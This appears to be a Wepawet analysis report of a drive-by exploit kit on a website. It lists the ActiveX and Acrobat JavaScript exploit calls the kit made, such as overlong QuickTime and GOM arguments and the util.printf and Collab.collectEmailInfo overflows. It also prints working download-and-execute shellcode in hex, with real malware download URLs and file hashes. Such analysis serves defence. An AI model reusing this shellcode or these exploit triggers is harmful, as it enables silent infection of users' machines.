Methods

GetDetailsString

e0 b0 8c e0 b0 8c e0 b0  8c e0 b0 8c e0 b0 8c e0 
b0 8c e0 b0 8c e0 b0 8c  e0 b0 8c e0 b0 8c e0 b0 
8c e0 b0 8c e0 b0 8c e0  b0 8c e0 b0 8c e0 b0 8c 
                other 5904 bytes                
e0 b0 8c e0 b0 8c e0 b0  8c e0 b0 8c e0 b0 8c e0 
b0 8c e0 b0 8c e0 b0 8c  e0 b0 8c e0 b0 8c e0 b0 
8c e0 b0 8c e0 b0 8c e0  b0 8c e0 b0 8c e0 b0 8c

1.0

DCE2F8B1-A520-11D4-8FD0-00D0B7730277
	Name	Count
Methods	initialize	1
Methods	send	1
	Name	Value	Count
Attributes	server	e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c other 14896 bytes b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c	1

9D39223E-AE8E-11D4-8FD3-00D0B7730277
	Name	Count
Methods	receive	1
	Name	Value	Count
Attributes	server	e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c other 14896 bytes b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c	1

5C6698D9-7BE4-4122-8EC5-291D84DBD4A0

Name

Value

Count

Attributes

ExtractExif

e0 b0 8c e0 b0 8c e0 b0  8c e0 b0 8c e0 b0 8c e0 
b0 8c e0 b0 8c e0 b0 8c  e0 b0 8c e0 b0 8c e0 b0 
8c e0 b0 8c e0 b0 8c e0  b0 8c e0 b0 8c e0 b0 8c 
                other 1104 bytes                
e0 b0 8c e0 b0 8c e0 b0  8c e0 b0 8c e0 b0 8c e0 
b0 8c e0 b0 8c e0 b0 8c  e0 b0 8c e0 b0 8c e0 b0 
8c e0 b0 8c e0 b0 8c e0  b0 8c e0 b0 8c e0 b0 8c

ExtractIptc

e0 b0 8c e0 b0 8c e0 b0  8c e0 b0 8c e0 b0 8c e0 
b0 8c e0 b0 8c e0 b0 8c  e0 b0 8c e0 b0 8c e0 b0 
8c e0 b0 8c e0 b0 8c e0  b0 8c e0 b0 8c e0 b0 8c 
                other 1104 bytes                
e0 b0 8c e0 b0 8c e0 b0  8c e0 b0 8c e0 b0 8c e0 
b0 8c e0 b0 8c e0 b0 8c  e0 b0 8c e0 b0 8c e0 b0 
8c e0 b0 8c e0 b0 8c e0  b0 8c e0 b0 8c e0 b0 8c

EEE78591-FE22-11D0-8BEF-0060081841DE
	Name	Arg0	Arg1	Arg2	Arg3	Arg4	Arg5	Arg6	Arg7	Arg8	Arg9	Arg10	Arg11	Arg12	Arg13	Arg14	Arg15	Arg16	Arg17	Arg18	Arg19	Arg20	Arg21	Arg22	Arg23	Arg24	Arg25	Arg26	Arg27	Count
Methods	FindEngine	default	default	default	default	''	1.0	default	default	1.0	1.0	1.0	1.0	1.0	1.0	1.0	1.0	1.0	1.0	1.0	1.0	1.0	1.0	1.0	1.0	1.0	1.0	1.0	1.0	1

0A5FD7C5-A45C-49FC-ADB5-9952547D5715

Name

Value

Count

Attributes

cachefolder

e0 b0 8c e0 b0 8c e0 b0  8c e0 b0 8c e0 b0 8c e0 
b0 8c e0 b0 8c e0 b0 8c  e0 b0 8c e0 b0 8c e0 b0 
8c e0 b0 8c e0 b0 8c e0  b0 8c e0 b0 8c e0 b0 8c 
                other 1440 bytes                
e0 b0 8c e0 b0 8c e0 b0  8c e0 b0 8c e0 b0 8c e0 
b0 8c e0 b0 8c e0 b0 8c  e0 b0 8c e0 b0 8c e0 b0 
8c e0 b0 8c e0 b0 8c e0  b0 8c e0 b0 8c e0 b0 8c

00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6
Name Value Count
Attributes

WksPictureInterface
2.02116108E8
1

F917534D-535B-416B-8E8F-0C04756C31A8

Name

Arg0

Count

Methods

IEStartNative

................................................................................
................................................................................
................................................................................
................................................................................
................................................................................
................................................................................
................................................................................
........................................

BF6EFFF3-4558-4C4C-ADAF-A87891C5F3A3

No attribute setting or method call detected
88D969C5-F192-11D4-A65F-0040963251E5

No attribute setting or method call detected

BF6EFFF3-4558-4C4C-ADAF-A87891C5F3A3
No attribute setting or method call detected

88D969C5-F192-11D4-A65F-0040963251E5
No attribute setting or method call detected

02BF25D5-8C17-4B23-BC80-D3488ABDDC6B
	Name	Value	Count
Attributes	src	object_rtsp	1
	type	image/x-quicktime	1
	target	myself	1
	qtnext1	<rtsp://BBBB:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA other 320 bytes AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA............>T<myself>	1
	autoplay	true	1

77829F14-D911-40FF-A2F0-D11DB8D6D0BC

Name

Arg0

Count

Methods

SetFormatLikeSample

e0 b0 8c e0 b0 8c e0 b0  8c e0 b0 8c e0 b0 8c e0 
b0 8c e0 b0 8c e0 b0 8c  e0 b0 8c e0 b0 8c e0 b0 
8c e0 b0 8c e0 b0 8c e0  b0 8c e0 b0 8c e0 b0 8c 
               other 15504 bytes                
e0 b0 8c e0 b0 8c e0 b0  8c e0 b0 8c e0 b0 8c e0 
b0 8c e0 b0 8c e0 b0 8c  e0 b0 8c e0 b0 8c e0 b0 
8c e0 b0 8c e0 b0 8c e0  b0 8c e0 b0 8c e0 b0 8c

AcrobatJavaScript
	Name	Arg0	Arg1	Count
Methods	Collab.collectEmailInfo	''	e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c other 196512 bytes e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c	1
util.printf	%45000f	1.3E295	1

AcrobatJavaScript

Name

Arg0

Arg1

Count

Methods

Collab.collectEmailInfo

''

e0 b0 8c e0 b0 8c e0 b0  8c e0 b0 8c e0 b0 8c e0 
b0 8c e0 b0 8c e0 b0 8c  e0 b0 8c e0 b0 8c e0 b0 
8c e0 b0 8c e0 b0 8c e0  b0 8c e0 b0 8c e0 b0 8c 
               other 196512 bytes               
e0 b0 8c e0 b0 8c e0 b0  8c e0 b0 8c e0 b0 8c e0 
b0 8c e0 b0 8c e0 b0 8c  e0 b0 8c e0 b0 8c e0 b0 
8c e0 b0 8c e0 b0 8c e0  b0 8c e0 b0 8c e0 b0 8c

util.printf

%45000f

1.3E295

IERPCtl.IERPCtl.1
Name Arg0 Count
Methods

PlayerProperty
PRODUCTVERSION
1
QuickTime.QuickTime.4

No attribute setting or method call detected

QuickTime.QuickTime.4
No attribute setting or method call detected

Downloader.DLoader.1
	Name	Arg0	Count
Methods	DownloadAndInstall	http://avtoinformator.info//shablon/07-12-14/system/load.php?id=5609	1

GomWebCtrl.GomManager.1

Name

Arg0

Count

Methods

OpenURL

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA......

Sb.SuperBuddy
Name Arg0 Count
Methods

LinkSBIcons
2.02116108E8
1

snpvw.Snapshot Viewer Control.1
	Name	Count
Methods	PrintSnapshot	3
	Name	Value	Count
Attributes	ShowNavigationButtons	false	3
	Zoom	0.0	3
	CompressedPath	e:/Program Files/Outlook Express/WAB.EXE	1
		d:/Program Files/Outlook Express/WAB.EXE	1
		c:/Program Files/Outlook Express/WAB.EXE	1
	AllowContextMenu	false	3
	SnapshotPath	http://avtoinformator.info//shablon/07-12-14/system/load.php?id=5609&opr=1	3

clsid:ca8a9780-280d-11cf-a24d-444553540000

No attribute setting or method call detected
Msxml2.XMLHTTP.4.0

No attribute setting or method call detected
AcroPDF.PDF

No attribute setting or method call detected
Msxml2.XMLHTTP.6.0

No attribute setting or method call detected

clsid:ca8a9780-280d-11cf-a24d-444553540000
No attribute setting or method call detected

Msxml2.XMLHTTP.4.0
No attribute setting or method call detected

AcroPDF.PDF
No attribute setting or method call detected

Msxml2.XMLHTTP.6.0
No attribute setting or method call detected

Shellcode and Malware

Hexadecimal	ASCII
43 43 43 43 43 43 eb 0f 5b 33 c9 66 b9 80 01 80 33 ef 43 e2 fa eb 05 e8 ec ff ff ff 7f 8b 4e df ef ef ef 64 af e3 64 9f f3 42 64 9f e7 6e 03 ef eb ef ef 64 03 b9 87 61 a1 e1 03 07 11 ef ef ef 66 aa eb b9 87 77 11 65 e1 07 1f ef ef ef 66 aa e7 b9 87 ca 5f 10 2d 07 0d ef ef ef 66 aa e3 b9 87 00 21 0f 8f 07 3b ef ef ef 66 aa ff b9 87 2e 96 0a 57 07 29 ef ef ef 66 aa fb af 6f d7 2c 9a 15 66 aa f7 06 e8 ee ef ef b1 66 9a cb 64 aa eb 85 ee b6 64 ba f7 b9 07 64 ef ef ef bf 87 d9 f5 c0 9f 07 78 ef ef ef 66 aa f3 64 2a 6c 2f bf 66 aa cf 87 10 ef ef ef bf 64 aa fb 85 ed b6 64 ba f7 07 8e ef ef ef ec aa cf 28 ef b3 91 c1 8a 28 af eb 97 8a ef ef 10 9a cf 64 aa e3 85 ee b6 64 ba f7 07 af ef ef ef 85 e8 b7 ec aa cb dc 34 bc bc 10 9a cf bf bc 64 aa f3 85 ea b6 64 ba f7 07 cc ef ef ef 85 ef 10 9a cf 64 aa e7 85 ed b6 64 ba f7 07 ff ef ef ef 85 10 64 aa ff 85 ee b6 64 ba f7 07 ef ef ef ef ae b4 bd ec 0e ec 0e ec 0e ec 0e 6c 03 eb b5 bc 64 35 0d 18 bd 10 0f ba 64 03 64 92 e7 64 b2 e3 b9 64 9c d3 64 9b f1 97 ec 1c b9 64 99 cf ec 1c dc 26 a6 ae 42 ec 2c b9 dc 19 e0 51 ff d5 1d 9b e7 2e 21 e2 ec 1d af 04 1e d4 11 b1 9a 0a b5 64 04 64 b5 cb ec 32 89 64 e3 a4 64 b5 f3 ec 32 64 eb 64 ec 2a b1 b2 2d e7 ef 07 1b 11 10 10 ba bd a3 a2 a0 a1 ef 68 74 74 70 3a 2f 2f 61 76 74 6f 69 6e 66 6f 72 6d 61 74 6f 72 2e 69 6e 66 6f 2f 2f 73 68 61 62 6c 6f 6e 2f 30 37 2d 31 32 2d 31 34 2f 73 79 73 74 65 6d 2f 6c 6f 61 64 2e 70 68 70 3f 69 64 3d 35 36 30 39	CCCCCC..[3.f.... 3.C...........N. ...d..d..Bd..n.. ...d...a........ f....w.e......f. ...._.-.....f... ..!...;...f..... ..W.)...f...o.,. .f........f..d.. ...d....d....... ...x...f..dl/.f ........d.....d. .........(.....( .........d.....d ..............4. ......d.....d... .........d.....d .........d.....d ................ ..l....d5......d .d..d...d..d.... ..d.....&..B.,.. ..Q......!...... ......d.d...2.d. .d...2d.d...-.. ............http ://avtoinformato r.info//shablon/ 07-12-14/system/ load.php?id=5609
43 43 43 43 43 43 eb 0f 5b 33 c9 66 b9 80 01 80 33 ef 43 e2 fa eb 05 e8 ec ff ff ff 7f 8b 4e df ef ef ef 64 af e3 64 9f f3 42 64 9f e7 6e 03 ef eb ef ef 64 03 b9 87 61 a1 e1 03 07 11 ef ef ef 66 aa eb b9 87 77 11 65 e1 07 1f ef ef ef 66 aa e7 b9 87 ca 5f 10 2d 07 0d ef ef ef 66 aa e3 b9 87 00 21 0f 8f 07 3b ef ef ef 66 aa ff b9 87 2e 96 0a 57 07 29 ef ef ef 66 aa fb af 6f d7 2c 9a 15 66 aa f7 06 e8 ee ef ef b1 66 9a cb 64 aa eb 85 ee b6 64 ba f7 b9 07 64 ef ef ef bf 87 d9 f5 c0 9f 07 78 ef ef ef 66 aa f3 64 2a 6c 2f bf 66 aa cf 87 10 ef ef ef bf 64 aa fb 85 ed b6 64 ba f7 07 8e ef ef ef ec aa cf 28 ef b3 91 c1 8a 28 af eb 97 8a ef ef 10 9a cf 64 aa e3 85 ee b6 64 ba f7 07 af ef ef ef 85 e8 b7 ec aa cb dc 34 bc bc 10 9a cf bf bc 64 aa f3 85 ea b6 64 ba f7 07 cc ef ef ef 85 ef 10 9a cf 64 aa e7 85 ed b6 64 ba f7 07 ff ef ef ef 85 10 64 aa ff 85 ee b6 64 ba f7 07 ef ef ef ef ae b4 bd ec 0e ec 0e ec 0e ec 0e 6c 03 eb b5 bc 64 35 0d 18 bd 10 0f ba 64 03 64 92 e7 64 b2 e3 b9 64 9c d3 64 9b f1 97 ec 1c b9 64 99 cf ec 1c dc 26 a6 ae 42 ec 2c b9 dc 19 e0 51 ff d5 1d 9b e7 2e 21 e2 ec 1d af 04 1e d4 11 b1 9a 0a b5 64 04 64 b5 cb ec 32 89 64 e3 a4 64 b5 f3 ec 32 64 eb 64 ec 2a b1 b2 2d e7 ef 07 1b 11 10 10 ba bd a3 a2 a0 a1 ef 68 74 74 70 3a 2f 2f 61 76 74 6f 69 6e 66 6f 72 6d 61 74 6f 72 2e 69 6e 66 6f 2f 2f 2f 73 68 61 62 6c 6f 6e 2f 30 37 2d 31 32 2d 31 34 2f 73 79 73 74 65 6d 2f 2f 6c 6f 61 64 2e 70 68 70 3f 69 64 3d 35 36 30 39 26 73 70 6c 3d 34	CCCCCC..[3.f.... 3.C...........N. ...d..d..Bd..n.. ...d...a........ f....w.e......f. ...._.-.....f... ..!...;...f..... ..W.)...f...o.,. .f........f..d.. ...d....d....... ...x...f..dl/.f ........d.....d. .........(.....( .........d.....d ..............4. ......d.....d... .........d.....d .........d.....d ................ ..l....d5......d .d..d...d..d.... ..d.....&..B.,.. ..Q......!...... ......d.d...2.d. .d...2d.d...-.. ............http ://avtoinformato r.info///shablon /07-12-14/system //load.php?id=56 09&spl=4
43 43 43 43 43 43 eb 0f 5b 33 c9 66 b9 80 01 80 33 ef 43 e2 fa eb 05 e8 ec ff ff ff 7f 8b 4e df ef ef ef 64 af e3 64 9f f3 42 64 9f e7 6e 03 ef eb ef ef 64 03 b9 87 61 a1 e1 03 07 11 ef ef ef 66 aa eb b9 87 77 11 65 e1 07 1f ef ef ef 66 aa e7 b9 87 ca 5f 10 2d 07 0d ef ef ef 66 aa e3 b9 87 00 21 0f 8f 07 3b ef ef ef 66 aa ff b9 87 2e 96 0a 57 07 29 ef ef ef 66 aa fb af 6f d7 2c 9a 15 66 aa f7 06 e8 ee ef ef b1 66 9a cb 64 aa eb 85 ee b6 64 ba f7 b9 07 64 ef ef ef bf 87 d9 f5 c0 9f 07 78 ef ef ef 66 aa f3 64 2a 6c 2f bf 66 aa cf 87 10 ef ef ef bf 64 aa fb 85 ed b6 64 ba f7 07 8e ef ef ef ec aa cf 28 ef b3 91 c1 8a 28 af eb 97 8a ef ef 10 9a cf 64 aa e3 85 ee b6 64 ba f7 07 af ef ef ef 85 e8 b7 ec aa cb dc 34 bc bc 10 9a cf bf bc 64 aa f3 85 ea b6 64 ba f7 07 cc ef ef ef 85 ef 10 9a cf 64 aa e7 85 ed b6 64 ba f7 07 ff ef ef ef 85 10 64 aa ff 85 ee b6 64 ba f7 07 ef ef ef ef ae b4 bd ec 0e ec 0e ec 0e ec 0e 6c 03 eb b5 bc 64 35 0d 18 bd 10 0f ba 64 03 64 92 e7 64 b2 e3 b9 64 9c d3 64 9b f1 97 ec 1c b9 64 99 cf ec 1c dc 26 a6 ae 42 ec 2c b9 dc 19 e0 51 ff d5 1d 9b e7 2e 21 e2 ec 1d af 04 1e d4 11 b1 9a 0a b5 64 04 64 b5 cb ec 32 89 64 e3 a4 64 b5 f3 ec 32 64 eb 64 ec 2a b1 b2 2d e7 ef 07 1b 11 10 10 ba bd a3 a2 a0 a1 ef 68 74 74 70 3a 2f 2f 61 76 74 6f 69 6e 66 6f 72 6d 61 74 6f 72 2e 69 6e 66 6f 2f 2f 2f 73 68 61 62 6c 6f 6e 2f 30 37 2d 31 32 2d 31 34 2f 73 79 73 74 65 6d 2f 2f 6c 6f 61 64 2e 70 68 70 3f 69 64 3d 35 36 30 39 26 73 70 6c 3d 36 39 00	CCCCCC..[3.f.... 3.C...........N. ...d..d..Bd..n.. ...d...a........ f....w.e......f. ...._.-.....f... ..!...;...f..... ..W.)...f...o.,. .f........f..d.. ...d....d....... ...x...f..dl/.f ........d.....d. .........(.....( .........d.....d ..............4. ......d.....d... .........d.....d .........d.....d ................ ..l....d5......d .d..d...d..d.... ..d.....&..B.,.. ..Q......!...... ......d.d...2.d. .d...2d.d...-.. ............http ://avtoinformato r.info///shablon /07-12-14/system //load.php?id=56 09&spl=69.
43 43 43 43 43 43 eb 0f 5b 33 c9 66 b9 80 01 80 33 ef 43 e2 fa eb 05 e8 ec ff ff ff 7f 8b 4e df ef ef ef 64 af e3 64 9f f3 42 64 9f e7 6e 03 ef eb ef ef 64 03 b9 87 61 a1 e1 03 07 11 ef ef ef 66 aa eb b9 87 77 11 65 e1 07 1f ef ef ef 66 aa e7 b9 87 ca 5f 10 2d 07 0d ef ef ef 66 aa e3 b9 87 00 21 0f 8f 07 3b ef ef ef 66 aa ff b9 87 2e 96 0a 57 07 29 ef ef ef 66 aa fb af 6f d7 2c 9a 15 66 aa f7 06 e8 ee ef ef b1 66 9a cb 64 aa eb 85 ee b6 64 ba f7 b9 07 64 ef ef ef bf 87 d9 f5 c0 9f 07 78 ef ef ef 66 aa f3 64 2a 6c 2f bf 66 aa cf 87 10 ef ef ef bf 64 aa fb 85 ed b6 64 ba f7 07 8e ef ef ef ec aa cf 28 ef b3 91 c1 8a 28 af eb 97 8a ef ef 10 9a cf 64 aa e3 85 ee b6 64 ba f7 07 af ef ef ef 85 e8 b7 ec aa cb dc 34 bc bc 10 9a cf bf bc 64 aa f3 85 ea b6 64 ba f7 07 cc ef ef ef 85 ef 10 9a cf 64 aa e7 85 ed b6 64 ba f7 07 ff ef ef ef 85 10 64 aa ff 85 ee b6 64 ba f7 07 ef ef ef ef ae b4 bd ec 0e ec 0e ec 0e ec 0e 6c 03 eb b5 bc 64 35 0d 18 bd 10 0f ba 64 03 64 92 e7 64 b2 e3 b9 64 9c d3 64 9b f1 97 ec 1c b9 64 99 cf ec 1c dc 26 a6 ae 42 ec 2c b9 dc 19 e0 51 ff d5 1d 9b e7 2e 21 e2 ec 1d af 04 1e d4 11 b1 9a 0a b5 64 04 64 b5 cb ec 32 89 64 e3 a4 64 b5 f3 ec 32 64 eb 64 ec 2a b1 b2 2d e7 ef 07 1b 11 10 10 ba bd a3 a2 a0 a1 ef 68 74 74 70 3a 2f 2f 61 66 72 65 74 2e 72 75 2f 2f 70 61 74 74 65 72 6e 73 2f 73 79 73 74 65 6d 2f 6c 6f 61 64 2e 70 68 70 3f 69 64 3d 35 35 39 30 00	CCCCCC..[3.f.... 3.C...........N. ...d..d..Bd..n.. ...d...a........ f....w.e......f. ...._.-.....f... ..!...;...f..... ..W.)...f...o.,. .f........f..d.. ...d....d....... ...x...f..dl/.f ........d.....d. .........(.....( .........d.....d ..............4. ......d.....d... .........d.....d .........d.....d ................ ..l....d5......d .d..d...d..d.... ..d.....&..B.,.. ..Q......!...... ......d.d...2.d. .d...2d.d...-.. ............http ://afret.ru//pat terns/system/loa d.php?id=5590.

Additional (potential) malware:

URL	Type	Hash	Analysis
http://afret.ru//patterns/system/load.php?id=5590	MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit	123ae8a094179cec47366eaaa84296f1	Anubis report Virustotal report
http://avtoinformator.info///shablon/07-12-14/system//load.php?id=5609&spl=4	MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit	123ae8a094179cec47366eaaa84296f1	Anubis report Virustotal report
http://avtoinformator.info///shablon/07-12-14/system//load.php?id=5609&spl=69	MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit	123ae8a094179cec47366eaaa84296f1	Anubis report Virustotal report
http://avtoinformator.info//shablon/07-12-14/system/load.php?id=5609	MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit	123ae8a094179cec47366eaaa84296f1	Anubis report Virustotal report
http://avtoinformator.info//shablon/07-12-14/system/load.php?id=5609&opr=1	MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit	123ae8a094179cec47366eaaa84296f1	Anubis report Virustotal report

Wepawet (alpha)

Analysis report for http://erotic-adventure.com

Sample Overview

Detection results

Exploits

Deobfuscation results

Evals

Writes

Network Activity

Requests

Redirects

ActiveX controls

Shellcode and Malware